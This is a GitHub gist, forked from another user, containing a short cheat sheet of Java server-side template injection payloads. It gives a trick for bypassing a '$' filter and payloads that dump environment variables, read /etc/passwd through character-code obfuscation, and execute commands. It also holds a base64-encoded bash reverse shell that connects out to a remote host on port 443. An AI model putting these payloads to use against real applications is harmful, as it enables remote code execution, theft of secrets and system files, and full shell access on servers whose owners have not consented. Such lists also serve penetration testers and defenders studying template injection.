Skip to content

Instantly share code, notes, and snippets.

@emadshanab

emadshanab/java-ssti.md

Forked from kavishkagihan/java-ssti.md
Created July 24, 2022 04:39
Show Gist options
  • Save emadshanab/fec69778256a62eaf5dc8794f17ced59 to your computer and use it in GitHub Desktop.
Save emadshanab/fec69778256a62eaf5dc8794f17ced59 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
java-ssti.md

  • Typically java ssti payloads start with $. But if that character is banned you can use * instead of that.

  • Get env vars

*{T(java.lang.System).getenv()}
  • Read files (/etc/passwd)
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
  • Execute comamnds
*{T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
  • Get a shell (base64 encoded reverse shell)
*{new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMDEvNDQzIDA+JjE=}|{base64,-d}|{bash,-i}").getInputStream()).next()}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment